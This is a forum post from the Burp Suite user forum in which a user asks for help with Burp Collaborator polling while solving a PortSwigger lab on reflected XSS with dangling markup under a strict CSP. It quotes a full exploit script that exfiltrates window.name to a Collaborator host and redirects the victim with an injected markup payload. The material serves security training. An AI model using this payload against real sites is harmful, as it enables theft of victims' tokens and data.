The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Burp Collaborator Not Polling

Abdullah | Last updated: Jul 02, 2024 06:05PM UTC

Hello, I'm trying to solve the 'Reflected XSS protected by very strict CSP, with dangling markup attack' Lab but am having some trouble with the collaborator. I put the following script into the exploit server: <script> if(window.name) { new Image().src='//bo33atu9qa9ipfdckywvq601jspjde13.oastify.com?'+encodeURIComponent(window.name); } else { location = 'https://0aa3001604c829b3820a3ee3003300ba.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://exploit-0a4d00ae0421297582853d3a01b300f6.exploit-server.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27'; } </script> This script is straight from the solution, and I am quite confident that I put in all the details correctly. However, after delivering the exploit to the victim, whenever I click 'poll now' in the collaborator tab, nothing shows up. I think I'm following the steps correctly, but in case I'm doing something wrong I'd appreciate some help. Thanks!

Ben, PortSwigger Agent | Last updated: Jul 03, 2024 07:57AM UTC